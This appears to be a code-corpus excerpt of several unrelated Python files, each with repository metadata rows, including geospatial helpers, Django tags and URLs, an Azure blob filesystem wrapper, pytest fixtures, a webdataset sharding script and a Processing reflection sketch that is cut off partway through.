# as of geopandas 0.6.2, using the OGR CSV driver requires some add'nal
# kwargs to create a valid geodataframe with a geometry column. see
# https://github.com/geopandas/geopandas/issues/1234
if gdf.lower().endswith('csv'):
return gpd.read_file(gdf, GEOM_POSSIBLE_NAMES="geometry",
KEEP_GEOM_COLUMNS="NO")
try:
return gpd.read_file(gdf)
except (DriverError, CPLE_OpenFailedError):
warn(f"GeoDataFrame couldn't be loaded: either {gdf} isn't a valid"
" path or it isn't a valid vector file. Returning an empty"
" GeoDataFrame.")
return gpd.GeoDataFrame()
elif isinstance(gdf, gpd.GeoDataFrame):
return gdf
else:
raise ValueError(f"{gdf} is not an accepted GeoDataFrame format.")
def _check_geom(geom):
"""Check if a geometry is loaded in.
Returns the geometry if it's a shapely geometry object. If it's a wkt
string or a list of coordinates, convert to a shapely geometry.
"""
if isinstance(geom, BaseGeometry):
return geom
elif isinstance(geom, str): # assume it's a wkt
return loads(geom)
elif isinstance(geom, list) and len(geom) == 2: # coordinates
return Point(geom)
def _check_crs(input_crs):
"""Convert CRS to the integer format passed by ``solaris``."""
if isinstance(input_crs, dict):
# assume it's an {'init': 'epsgxxxx'} dict
out_crs = int(input_crs['init'].lower().strip('epsg:'))
out_crs = rasterio.crs.CRS.from_epsg(out_crs)
elif isinstance(input_crs, str):
#pdb.set_trace()
# handle PROJ4 strings, epsg strings, wkt strings
# but FIRST, see if it's just a number represented as a string
try:
input_crs = int(input_crs)
out_crs = rasterio.crs.CRS.from_epsg(input_crs)
except ValueError:
try:
out_crs = rasterio.crs.CRS.from_string(input_crs)
except rasterio.errors.CRSError as e:
raise ValueError(
f"Solaris doesn't know how to parse {input_crs} as a "
"crs. Try re-formatting. If this is properly formatted, "
"open an issue in solaris's GitHub repository."
) from e
elif isinstance(input_crs, rasterio.crs.CRS):
out_crs = input_crs
elif isinstance(input_crs, int):
out_crs = rasterio.crs.CRS.from_epsg(input_crs)
elif input_crs is None:
out_crs = input_crs
else:
out_crs = input_crs
return out_crs
def get_data_paths(path, infer=False):
"""Get a pandas dataframe of images and labels from a csv.
This file is designed to parse image:label reference CSVs (or just image)
for inferencde) as defined in the documentation. Briefly, these should be
CSVs containing two columns:
``'image'``: the path to images.
``'label'``: the path to the label file that corresponds to the image.
Arguments
---------
path : str
Path to a .CSV-formatted reference file defining the location of
training, validation, or inference data. See docs for details.
infer : bool, optional
If ``infer=True`` , the ``'label'`` column will not be returned (as it
is unnecessary for inference), even if it is present.
Returns
-------
df : :class:`pandas.DataFrame`
A :class:`pandas.DataFrame` containing the relevant `image` and `label`
information from the CSV at `path` (unless ``infer=True`` , in which
case only the `image` column is returned.)
"""
df = pd.read_csv(path)
if infer:
return df[['image']] # no labels in those files
else:
return df[['image', 'label']] # remove anything extraneous
def get_files_recursively(path, traverse_subdirs=False, extension='.tif'):
"""Get files from subdirs of `path`, joining them to the dir."""
if traverse_subdirs:
walker = os.walk(path)
path_list = []
for step in walker:
if not step[2]: # if there are no files in the current dir
continue
path_list += [os.path.join(step[0], fname)
for fname in step[2] if
fname.lower().endswith(extension)]
return path_list
else:
return [os.path.join(path, f) for f in os.listdir(path)
if f.endswith(extension)]
| 35.798817
| 79
| 0.624793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,606
| 0.430744
|
658e190370f91502c18753af3de961237b0e0150
| 129
|
py
|
Python
|
model/__init__.py
|
Pearl-UTexas/DUST-net
|
debea05a04e9340109176c7803909b50f84892ba
|
[
"MIT"
] | null | null | null |
model/__init__.py
|
Pearl-UTexas/DUST-net
|
debea05a04e9340109176c7803909b50f84892ba
|
[
"MIT"
] | null | null | null |
model/__init__.py
|
Pearl-UTexas/DUST-net
|
debea05a04e9340109176c7803909b50f84892ba
|
[
"MIT"
] | null | null | null |
from .von_mises_stiefel import *
from .von_mises_fisher import *
from .model import *
from .metrics import *
from .loss import *
| 21.5
| 32
| 0.767442
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
658e27d4f55208e3b1fbe0a8174313df62d9c767
| 980
|
py
|
Python
|
blog_app/templatetags/blog_app_tags.py
|
axkiss/FirstBlog
|
dc4444c70c58647abf733f06bab963eadced646d
|
[
"Unlicense"
] | null | null | null |
blog_app/templatetags/blog_app_tags.py
|
axkiss/FirstBlog
|
dc4444c70c58647abf733f06bab963eadced646d
|
[
"Unlicense"
] | null | null | null |
blog_app/templatetags/blog_app_tags.py
|
axkiss/FirstBlog
|
dc4444c70c58647abf733f06bab963eadced646d
|
[
"Unlicense"
] | null | null | null |
from django import template
from blog_app.models import Post
from django.utils import timezone
register = template.Library()
@register.simple_tag(name='list_tags')
def get_list_tags(pos, cnt_head_tag, cnt_side_tag):
list_tags = Post.tag.most_common()
if pos == 'head':
return list_tags[:cnt_head_tag]
else:
return list_tags[cnt_head_tag:cnt_head_tag + cnt_side_tag]
@register.simple_tag(name='popular_posts')
def get_popular_posts(days, cnt_posts):
# if blog hasn't publications
if not Post.objects.last():
return ''
end_date = Post.objects.last().created_at
start_date = end_date - timezone.timedelta(days=days)
popular_posts = Post.objects.filter(
created_at__range=(start_date, end_date)).order_by('-views')[:cnt_posts]
# if no publications for a long time
if len(popular_posts) < cnt_posts:
popular_posts = Post.objects.order_by('-views', '-created_at')[:cnt_posts]
return popular_posts
| 32.666667
| 82
| 0.720408
| 0
| 0
| 0
| 0
| 848
| 0.865306
| 0
| 0
| 128
| 0.130612
|
658e58ab530a47e10043fd6372afe98be7d02d5f
| 3,941
|
py
|
Python
|
flow/core/azure_blob_filesystem.py
|
hwknsj/synergy_flow
|
aba8f57b2cbeeb0368a64eaa7e5369fcef0a3136
|
[
"BSD-3-Clause"
] | null | null | null |
flow/core/azure_blob_filesystem.py
|
hwknsj/synergy_flow
|
aba8f57b2cbeeb0368a64eaa7e5369fcef0a3136
|
[
"BSD-3-Clause"
] | 1
|
2016-10-03T18:48:15.000Z
|
2019-11-01T21:53:30.000Z
|
flow/core/azure_blob_filesystem.py
|
hwknsj/synergy_flow
|
aba8f57b2cbeeb0368a64eaa7e5369fcef0a3136
|
[
"BSD-3-Clause"
] | 1
|
2019-11-02T00:45:26.000Z
|
2019-11-02T00:45:26.000Z
|
__author__ = 'Bohdan Mushkevych'
from os import path
from azure.storage.blob import BlockBlobService
from flow.core.abstract_filesystem import AbstractFilesystem, splitpath
class AzureBlobFilesystem(AbstractFilesystem):
""" implementation of Azure Page Blob filesystem
https://docs.microsoft.com/en-us/azure/storage/blobs/storage-python-how-to-use-blob-storage#download-and-install-azure-storage-sdk-for-python"""
def __init__(self, logger, context, **kwargs):
super(AzureBlobFilesystem, self).__init__(logger, context, **kwargs)
try:
self.block_blob_service = BlockBlobService(account_name=context.settings['azure_account_name'],
account_key=context.settings['azure_account_key'])
except EnvironmentError as e:
self.logger.error('Azure Credentials are NOT valid. Terminating.', exc_info=True)
raise ValueError(e)
def __del__(self):
pass
def _azure_bucket(self, bucket_name):
if not bucket_name:
bucket_name = self.context.settings['azure_bucket']
return bucket_name
def mkdir(self, uri_path, bucket_name=None, **kwargs):
def _create_folder_file():
folder_key = path.join(root, '{0}_$folder$'.format(folder_name))
if not self.block_blob_service.exists(azure_bucket, folder_key):
self.block_blob_service.create_blob_from_text(azure_bucket, folder_key, '')
azure_bucket = self._azure_bucket(bucket_name)
root = ''
for folder_name in splitpath(uri_path):
root = path.join(root, folder_name)
_create_folder_file()
def rmdir(self, uri_path, bucket_name=None, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
for key in self.block_blob_service.list_blobs(azure_bucket, prefix='{0}/'.format(uri_path)):
self.block_blob_service.delete_blob(azure_bucket, key)
def rm(self, uri_path, bucket_name=None, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
self.block_blob_service.delete_blob(azure_bucket, uri_path)
def cp(self, uri_source, uri_target, bucket_name_source=None, bucket_name_target=None, **kwargs):
azure_bucket_source = self._azure_bucket(bucket_name_source)
azure_bucket_target = self._azure_bucket(bucket_name_target)
source_blob_url = self.block_blob_service.make_blob_url(azure_bucket_source, uri_source)
self.block_blob_service.copy_blob(azure_bucket_target, uri_target, source_blob_url)
def mv(self, uri_source, uri_target, bucket_name_source=None, bucket_name_target=None, **kwargs):
self.cp(uri_source, uri_target, bucket_name_source, bucket_name_target, **kwargs)
self.rm(uri_source, bucket_name_source)
def copyToLocal(self, uri_source, uri_target, bucket_name_source=None, **kwargs):
azure_bucket_source = self._azure_bucket(bucket_name_source)
with open(uri_target, 'wb') as file_pointer:
self.block_blob_service.get_blob_to_stream(azure_bucket_source, uri_source, file_pointer)
def copyFromLocal(self, uri_source, uri_target, bucket_name_target=None, **kwargs):
azure_bucket_target = self._azure_bucket(bucket_name_target)
with open(uri_source, 'rb') as file_pointer:
self.block_blob_service.create_blob_from_stream(azure_bucket_target, uri_target, file_pointer)
def exists(self, uri_path, bucket_name=None, exact=False, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
is_found = self.block_blob_service.exists(azure_bucket, uri_path)
if exact is False and is_found is False:
folder_name = '{0}_$folder$'.format(path.basename(uri_path))
folder_key = path.join(uri_path, folder_name)
is_found = self.block_blob_service.exists(azure_bucket, folder_key)
return is_found
| 49.886076
| 148
| 0.713524
| 3,762
| 0.95458
| 0
| 0
| 0
| 0
| 0
| 0
| 363
| 0.092109
|
658f10b8ae6eef666116cd8610e4111c0de53318
| 1,085
|
py
|
Python
|
asyncworker/types/registry.py
|
etandel/async-worker
|
3cd68e3e4dc3a32d35a4fa67bfd26cf2cfb7e01a
|
[
"MIT"
] | null | null | null |
asyncworker/types/registry.py
|
etandel/async-worker
|
3cd68e3e4dc3a32d35a4fa67bfd26cf2cfb7e01a
|
[
"MIT"
] | null | null | null |
asyncworker/types/registry.py
|
etandel/async-worker
|
3cd68e3e4dc3a32d35a4fa67bfd26cf2cfb7e01a
|
[
"MIT"
] | null | null | null |
from typing import Type, Any, Dict, Optional
class RegistryItem:
def __init__(self, type: Type, value: Any) -> None:
self.type = type
self.value = value
class TypesRegistry:
def __init__(self):
self.__data: Dict[Type, RegistryItem] = {}
self.__by_name: Dict[str, RegistryItem] = {}
def set(
self,
obj: Any,
type_definition: Type = None,
param_name: Optional[str] = None,
) -> None:
self.__data[obj.__class__] = RegistryItem(type=obj.__class__, value=obj)
if param_name:
self.__by_name[param_name] = RegistryItem(
type=obj.__class__, value=obj
)
def get(self, _type: Type, param_name: str = None) -> Optional[Any]:
if param_name:
try:
if self.__by_name[param_name].type == _type:
return self.__by_name[param_name].value
except KeyError:
return None
try:
return self.__data[_type].value
except KeyError:
return None
| 27.820513
| 80
| 0.564055
| 1,034
| 0.952995
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
6590118b6d44f92c7d79cfaff34140de85d60254
| 591
|
py
|
Python
|
kpe/BertKPE/MyCode/functions/filer/filesaver.py
|
thunlp/COVID19IRQA
|
fe359ce12ce38fd74ccc004cc524ec6011580023
|
[
"MIT"
] | 32
|
2020-03-26T17:03:54.000Z
|
2021-09-10T08:30:48.000Z
|
kpe/BertKPE/MyCode/functions/filer/filesaver.py
|
thunlp/COVID19IRQA
|
fe359ce12ce38fd74ccc004cc524ec6011580023
|
[
"MIT"
] | 1
|
2020-04-06T16:35:12.000Z
|
2020-04-13T07:08:14.000Z
|
kpe/BertKPE/MyCode/functions/filer/filesaver.py
|
thunlp/COVID19IRQA
|
fe359ce12ce38fd74ccc004cc524ec6011580023
|
[
"MIT"
] | 6
|
2020-03-28T05:07:22.000Z
|
2021-03-04T01:46:00.000Z
|
from tqdm import tqdm
import json
import os
def save_jsonl(data_list, filename):
with open(filename, 'w', encoding='utf-8') as fo:
for data in data_list:
fo.write("{}\n".format(json.dumps(data)))
fo.close()
print("Success save file to %s \n" %filename)
def save_json(data_list, filename):
with open(filename, "w", encoding="utf-8") as f:
json.dump(data_list, f)
f.close()
print("Success save file to %s \n" %filename)
def check_or_create_folder(folder):
if not os.path.exists(folder):
os.mkdir(folder)
| 25.695652
| 53
| 0.620981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 82
| 0.138748
|
6590b1b797014d04b65cb873f63aee28028c3c0f
| 6,563
|
py
|
Python
|
tests/conftest.py
|
HenryTraill/morpheus
|
6bc095a7734f5f4a48d8556006266bf60ecdba68
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
HenryTraill/morpheus
|
6bc095a7734f5f4a48d8556006266bf60ecdba68
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
HenryTraill/morpheus
|
6bc095a7734f5f4a48d8556006266bf60ecdba68
|
[
"MIT"
] | null | null | null |
import asyncio
import pytest
import re
import uuid
from aiohttp.test_utils import teardown_test_loop
from aioredis import create_redis
from arq import ArqRedis, Worker
from atoolbox.db import prepare_database
from atoolbox.db.helpers import DummyPgPool
from atoolbox.test_utils import DummyServer, create_dummy_server
from buildpg import Values, asyncpg
from morpheus.app.main import create_app
from morpheus.app.models import EmailSendModel, SendMethod
from morpheus.app.settings import Settings
from morpheus.app.views import get_create_company_id
from morpheus.app.worker import startup as worker_startup, worker_functions
from . import dummy_server
def pytest_addoption(parser):
parser.addoption('--reuse-db', action='store_true', default=False, help='keep the existing database if it exists')
pg_settings = dict(pg_dsn='postgres://postgres:waffle@localhost:5432/morpheus_test')
@pytest.fixture(scope='session', name='clean_db')
def _fix_clean_db(request):
# loop fixture has function scope so can't be used here.
settings = Settings(**pg_settings)
loop = asyncio.new_event_loop()
loop.run_until_complete(prepare_database(settings, not request.config.getoption('--reuse-db')))
teardown_test_loop(loop)
@pytest.fixture(name='db_conn')
async def _fix_db_conn(loop, settings, clean_db):
conn = await asyncpg.connect_b(dsn=settings.pg_dsn, loop=loop)
tr = conn.transaction()
await tr.start()
await conn.execute("set client_min_messages = 'log'")
yield conn
await tr.rollback()
await conn.close()
@pytest.yield_fixture
async def redis(loop, settings):
addr = settings.redis_settings.host, settings.redis_settings.port
redis = await create_redis(addr, db=settings.redis_settings.database, encoding='utf8', commands_factory=ArqRedis)
await redis.flushdb()
yield redis
redis.close()
await redis.wait_closed()
@pytest.fixture(name='dummy_server')
async def _fix_dummy_server(aiohttp_server):
ctx = {'mandrill_subaccounts': {}}
return await create_dummy_server(aiohttp_server, extra_routes=dummy_server.routes, extra_context=ctx)
@pytest.fixture
def settings(tmpdir, dummy_server: DummyServer):
return Settings(
**pg_settings,
auth_key='testing-key',
test_output=str(tmpdir),
pdf_generation_url=dummy_server.server_name + '/generate.pdf',
mandrill_key='good-mandrill-testing-key',
log_level='ERROR',
mandrill_url=dummy_server.server_name + '/mandrill',
mandrill_timeout=0.5,
host_name=None,
click_host_name='click.example.com',
messagebird_key='good-messagebird-testing-key',
messagebird_url=dummy_server.server_name + '/messagebird',
stats_token='test-token',
max_request_stats=10,
)
@pytest.fixture(name='cli')
async def _fix_cli(loop, test_client, settings, db_conn, redis):
async def pre_startup(app):
app.update(redis=redis, pg=DummyPgPool(db_conn))
app = create_app(settings=settings)
app.update(pg=DummyPgPool(db_conn), webhook_auth_key=b'testing')
app.on_startup.insert(0, pre_startup)
cli = await test_client(app)
cli.server.app['morpheus_api'].root = f'http://localhost:{cli.server.port}/'
return cli
@pytest.fixture
def send_email(cli, worker):
async def _send_message(status_code=201, **extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='<body>\n{{{ message }}}\n</body>',
company_code='foobar',
from_address='Sender Name <sender@example.com>',
method='email-test',
subject_template='test message',
context={'message': 'this is a test'},
recipients=[{'address': 'foobar@testing.com'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/email/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == status_code
await worker.run_check()
if len(data['recipients']) != 1:
return NotImplemented
else:
return re.sub(r'[^a-zA-Z0-9\-]', '', f'{data["uid"]}-{data["recipients"][0]["address"]}')
return _send_message
@pytest.fixture
def send_sms(cli, worker):
async def _send_message(**extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='this is a test {{ variable }}',
company_code='foobar',
from_name='FooBar',
method='sms-test',
context={'variable': 'apples'},
recipients=[{'number': '07896541236'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/sms/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == 201
await worker.run_check()
return data['uid'] + '-447896541236'
return _send_message
@pytest.yield_fixture(name='worker_ctx')
async def _fix_worker_ctx(settings, db_conn):
ctx = dict(settings=settings, pg=DummyPgPool(db_conn))
await worker_startup(ctx)
yield ctx
await asyncio.gather(ctx['session'].close(), ctx['mandrill'].close(), ctx['messagebird'].close())
@pytest.yield_fixture(name='worker')
async def _fix_worker(cli, worker_ctx):
worker = Worker(
functions=worker_functions, redis_pool=cli.server.app['redis'], burst=True, poll_delay=0.01, ctx=worker_ctx
)
yield worker
await worker.close()
@pytest.fixture(name='call_send_emails')
def _fix_call_send_emails(db_conn):
async def run(**kwargs):
base_kwargs = dict(
uid=str(uuid.uuid4()),
subject_template='hello',
company_code='test',
from_address='testing@example.com',
method=SendMethod.email_mandrill,
recipients=[],
)
m = EmailSendModel(**dict(base_kwargs, **kwargs))
company_id = await get_create_company_id(db_conn, m.company_code)
group_id = await db_conn.fetchval_b(
'insert into message_groups (:values__names) values :values returning id',
values=Values(
uuid=m.uid,
company_id=company_id,
message_method=m.method.value,
from_email=m.from_address.email,
from_name=m.from_address.name,
),
)
return group_id, company_id, m
return run
| 32.979899
| 118
| 0.666464
| 0
| 0
| 1,079
| 0.164407
| 5,637
| 0.858906
| 4,179
| 0.636751
| 1,298
| 0.197775
|
65914d3047a8283780b6e3edcde39dc7eb8ebb8b
| 477
|
py
|
Python
|
gratify_proj/gratify_proj/urls.py
|
ConnorH2582/grat_proj
|
f59b4a30ef0bef48b81fb75ade92af615b1e3e77
|
[
"MIT"
] | null | null | null |
gratify_proj/gratify_proj/urls.py
|
ConnorH2582/grat_proj
|
f59b4a30ef0bef48b81fb75ade92af615b1e3e77
|
[
"MIT"
] | null | null | null |
gratify_proj/gratify_proj/urls.py
|
ConnorH2582/grat_proj
|
f59b4a30ef0bef48b81fb75ade92af615b1e3e77
|
[
"MIT"
] | null | null | null |
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import View
urlpatterns = [
url(r'^client/', include('client.urls', namespace = 'client', app_name = 'client')),
url(r'^app/', include('app.urls', namespace = 'app', app_name = 'app')),
url('', include('django.contrib.auth.urls', namespace='auth')),
url('', include('social.apps.django_app.urls', namespace='social')),
url(r'^admin/', include(admin.site.urls)),
]
| 31.8
| 85
| 0.685535
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 151
| 0.316562
|
659182ecb712f24f0371757649f6618c51a53b68
| 193
|
py
|
Python
|
Server/prediction/admin.py
|
mohanj098/Item-Price-Forecasting
|
14fc787ad4d9dcc6af03b43fa5e866cd254a99f5
|
[
"MIT"
] | null | null | null |
Server/prediction/admin.py
|
mohanj098/Item-Price-Forecasting
|
14fc787ad4d9dcc6af03b43fa5e866cd254a99f5
|
[
"MIT"
] | 2
|
2021-03-15T15:53:22.000Z
|
2021-05-03T09:32:34.000Z
|
Server/prediction/admin.py
|
mohanj098/Item-Price-Forecasting
|
14fc787ad4d9dcc6af03b43fa5e866cd254a99f5
|
[
"MIT"
] | 1
|
2021-05-04T15:35:06.000Z
|
2021-05-04T15:35:06.000Z
|
from django.contrib import admin
from prediction.models import product
from prediction.models import price
# Register your models here.
admin.site.register(product)
admin.site.register(price)
| 24.125
| 37
| 0.829016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.145078
|
65923c69268087aca7de1d2a3dc4a13663164289
| 5,813
|
py
|
Python
|
imutils/big/make_shards.py
|
JacobARose/image-utils
|
aa0e005c0b4df5198d188b074f4e21f8d8f97962
|
[
"MIT"
] | null | null | null |
imutils/big/make_shards.py
|
JacobARose/image-utils
|
aa0e005c0b4df5198d188b074f4e21f8d8f97962
|
[
"MIT"
] | null | null | null |
imutils/big/make_shards.py
|
JacobARose/image-utils
|
aa0e005c0b4df5198d188b074f4e21f8d8f97962
|
[
"MIT"
] | null | null | null |
"""
imutils/big/make_shards.py
Generate one or more webdataset-compatible tar archive shards from an image classification dataset.
Based on script: https://github.com/tmbdev-archive/webdataset-examples/blob/7f56e9a8b978254c06aa0a98572a1331968b0eb3/makeshards.py
Added on: Sunday March 6th, 2022
Example usage:
python "/media/data/jacob/GitHub/image-utils/imutils/big/make_shards.py" \
--subsets=train,val,test \
--maxsize='1e9' \
--maxcount=50000 \
--shard_dir="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset" \
--catalog_dir="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog" \
--debug
"""
import sys
import os
import os.path
import random
import argparse
from torchvision import datasets
import webdataset as wds
import numpy as np
import os
from typing import Optional, Tuple, Any, Dict
from tqdm import trange, tqdm
import tarfile
tarfile.DEFAULT_FORMAT = tarfile.GNU_FORMAT
import webdataset as wds
# from imutils.big.datamodule import Herbarium2022DataModule, Herbarium2022Dataset
from imutils.ml.data.datamodule import Herbarium2022DataModule, Herbarium2022Dataset
def read_file_binary(fname):
"Read a binary file from disk."
with open(fname, "rb") as stream:
return stream.read()
all_keys = set()
def prepare_sample(dataset, index, subset: str="train", filekey: bool=False) -> Dict[str, Any]:
image_binary, label, metadata = dataset[index]
key = metadata["catalog_number"]
assert key not in all_keys
all_keys.add(key)
xkey = key if filekey else "%07d" % index
sample = {"__key__": xkey,
"image.jpg": image_binary}
if subset != "test":
assert label == dataset.targets[index]
sample["label.cls"] = int(label)
return sample
def write_dataset(catalog_dir: Optional[str]=None,
shard_dir: Optional[str]=None,
subset="train",
maxsize=1e9,
maxcount=100000,
limit_num_samples: Optional[int]=np.inf,
filekey: bool=False,
dataset=None):
if dataset is None:
datamodule = Herbarium2022DataModule(catalog_dir=catalog_dir,
num_workers=4,
image_reader=read_file_binary,
remove_transforms=True)
datamodule.setup()
dataset = datamodule.get_dataset(subset=subset)
num_samples = len(dataset)
print(f"With subset={subset}, Total num_samples: {num_samples}")
if limit_num_samples < num_samples:
num_samples = limit_num_samples
print(f"Limiting this run to num_samples: {num_samples}")
indices = list(range(num_samples))
os.makedirs(shard_dir, exist_ok=True)
pattern = os.path.join(shard_dir, f"herbarium_2022-{subset}-%06d.tar")
with wds.ShardWriter(pattern, maxsize=maxsize, maxcount=maxcount) as sink:
for i in tqdm(indices, desc=f"idx(Total={num_samples})"):
sample = prepare_sample(dataset, index=i, subset=subset, filekey=filekey)
sink.write(sample)
return dataset, indices
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser("""Generate sharded dataset from supervised image dataset.""")
parser.add_argument("--subsets", default="train,val,test", help="which subsets to write")
parser.add_argument(
"--filekey", action="store_true", help="use file as key (default: index)"
)
parser.add_argument("--maxsize", type=float, default=1e9)
parser.add_argument("--maxcount", type=float, default=100000)
parser.add_argument(
"--shard_dir",
default="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset",
help="directory where shards are written"
)
parser.add_argument(
"--catalog_dir",
default="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog",
help="directory containing csv versions of the original train & test metadata json files from herbarium 2022",
)
parser.add_argument("--debug", action="store_true", default=False,
help="Provide this boolean flag to produce a debugging shard dataset of only a maximum of 200 samples per data subset. [TODO] Switch to temp directories when this flag is passed.")
args = parser.parse_args()
return args
def main(args):
# args = parse_args()
assert args.maxsize > 10000000 # Shards must be a minimum of 10+ MB
assert args.maxcount < 1000000 # Shards must contain a maximum of 1,000,000 samples each
limit_num_samples = 200 if args.debug else np.inf
# if not os.path.isdir(os.path.join(args.data, "train")):
# print(f"{args.data}: should be directory containing ImageNet", file=sys.stderr)
# print(f"suitable as argument for torchvision.datasets.ImageNet(...)", file=sys.stderr)
# sys.exit(1)
# if not os.path.isdir(os.path.join(args.shards, ".")):
# print(f"{args.shards}: should be a writable destination directory for shards", file=sys.stderr)
# sys.exit(1)
subsets = args.subsets.split(",")
for subset in tqdm(subsets, leave=True, desc=f"Processing {len(subsets)} subsets"):
# print("# subset", subset)
dataset, indices = write_dataset(catalog_dir=args.catalog_dir,
shard_dir=args.shard_dir,
subset=subset,
maxsize=args.maxsize,
maxcount=args.maxcount,
limit_num_samples=limit_num_samples,
filekey=args.filekey)
CATALOG_DIR = "/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog"
# SHARD_DIR = "/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset"
if __name__ == "__main__":
args = parse_args()
main(args)
written_files = os.listdir(args.shard_dir)
files_per_subset = {"train":[],
"val":[],
"test":[]}
for subset,v in files_per_subset.items():
files_per_subset[subset] = len([f for f in written_files if subset in f])
from rich import print as pp
print(f"SUCCESS! TARGET SHARD DIR CONTAINS THE FOLLOWING:")
pp(files_per_subset)
| 31.085561
| 188
| 0.732152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,592
| 0.445897
|
65941982873c5bf22451352b6be11931a96f85a2
| 2,917
|
py
|
Python
|
wetterdienst/util/network.py
|
meteoDaniel/wetterdienst
|
106a2fa9f887983281a6886c15bb3a845850dfb7
|
[
"MIT"
] | null | null | null |
wetterdienst/util/network.py
|
meteoDaniel/wetterdienst
|
106a2fa9f887983281a6886c15bb3a845850dfb7
|
[
"MIT"
] | null | null | null |
wetterdienst/util/network.py
|
meteoDaniel/wetterdienst
|
106a2fa9f887983281a6886c15bb3a845850dfb7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, earthobservations developers.
# Distributed under the MIT License. See LICENSE for more info.
import os
from io import BytesIO
from typing import List, Optional, Union
from fsspec.implementations.cached import WholeFileCacheFileSystem
from fsspec.implementations.http import HTTPFileSystem
from wetterdienst.util.cache import (
FSSPEC_CLIENT_KWARGS,
WD_CACHE_DISABLE,
CacheExpiry,
cache_dir,
)
class NetworkFilesystemManager:
"""
Manage multiple FSSPEC instances keyed by cache expiration time.
"""
filesystems = {}
@staticmethod
def resolve_ttl(ttl: Union[int, CacheExpiry]):
ttl_name = ttl
ttl_value = ttl
if isinstance(ttl, CacheExpiry):
ttl_name = ttl.name
ttl_value = ttl.value
return ttl_name, ttl_value
@classmethod
def register(cls, ttl=CacheExpiry.NO_CACHE):
ttl_name, ttl_value = cls.resolve_ttl(ttl)
key = f"ttl-{ttl_name}"
real_cache_dir = os.path.join(cache_dir, "fsspec", key)
filesystem_real = HTTPFileSystem(use_listings_cache=True, client_kwargs=FSSPEC_CLIENT_KWARGS)
if WD_CACHE_DISABLE or ttl is CacheExpiry.NO_CACHE:
filesystem_effective = filesystem_real
else:
filesystem_effective = WholeFileCacheFileSystem(
fs=filesystem_real, cache_storage=real_cache_dir, expiry_time=ttl_value
)
cls.filesystems[key] = filesystem_effective
@classmethod
def get(cls, ttl=CacheExpiry.NO_CACHE):
ttl_name, ttl_value = cls.resolve_ttl(ttl)
key = f"ttl-{ttl_name}"
if key not in cls.filesystems:
cls.register(ttl=ttl)
return cls.filesystems[key]
def list_remote_files_fsspec(url: str, ttl: CacheExpiry = CacheExpiry.FILEINDEX) -> List[str]:
"""
A function used to create a listing of all files of a given path on the server.
The default ttl with ``CacheExpiry.FILEINDEX`` is "5 minutes".
:param url: The URL which should be searched for files.
:param ttl: The cache expiration time.
:returns: A list of strings representing the files from the path.
"""
fs = HTTPFileSystem(
use_listings_cache=True,
listings_expiry_time=not WD_CACHE_DISABLE and ttl.value,
listings_cache_type="filedircache",
listings_cache_location=cache_dir,
)
return fs.find(url)
def download_file(url: str, ttl: Optional[int] = CacheExpiry.NO_CACHE) -> BytesIO:
"""
A function used to download a specified file from the server.
:param url: The url to the file on the dwd server
:param ttl: How long the resource should be cached.
:returns: Bytes of the file.
"""
filesystem = NetworkFilesystemManager.get(ttl=ttl)
payload = filesystem.cat(url)
return BytesIO(payload)
| 31.365591
| 101
| 0.680151
| 1,310
| 0.449092
| 0
| 0
| 1,154
| 0.395612
| 0
| 0
| 869
| 0.297909
|
65941fce079e2342f67bde15c5c07c193940a076
| 2,927
|
pyde
|
Python
|
mode/examples/Topics/Motion/Reflection1/Reflection1.pyde
|
kazimuth/processing.py
|
9aa1ddf7ebd4efed73a8c2a1ecf6d2c167b1faf1
|
[
"Apache-2.0"
] | 4
|
2016-08-09T14:14:36.000Z
|
2021-12-10T07:51:35.000Z
|
mode/examples/Topics/Motion/Reflection1/Reflection1.pyde
|
kazimuth/processing.py
|
9aa1ddf7ebd4efed73a8c2a1ecf6d2c167b1faf1
|
[
"Apache-2.0"
] | null | null | null |
mode/examples/Topics/Motion/Reflection1/Reflection1.pyde
|
kazimuth/processing.py
|
9aa1ddf7ebd4efed73a8c2a1ecf6d2c167b1faf1
|
[
"Apache-2.0"
] | null | null | null |
"""
Non-orthogonal Reflection
by Ira Greenberg.
Based on the equation (R = 2N(N * L) - L) where R is the reflection vector, N
is the normal, and L is the incident vector.
"""
# Position of left hand side of floor.
base1 = None
# Position of right hand side of floor.
base2 = None
# A list of subpoints along the floor path.
coords = []
# Variables related to moving ball.
position = None
velocity = None
r = 6
speed = 3.5
def setup():
size(640, 360)
fill(128)
base1 = PVector(0, height - 150)
base2 = PVector(width, height)
createGround()
# Start ellipse at middle top of screen.
position = PVector(width / 2, 0)
# Calculate initial random velocity.
velocity = PVector.random2D()
velocity.mult(speed)
def draw():
# Draw background.
fill(0, 12)
noStroke()
rect(0, 0, width, height)
# Draw base.
fill(200)
quad(base1.x, base1.y, base2.x, base2.y, base2.x, height, 0, height)
# Calculate base top normal.
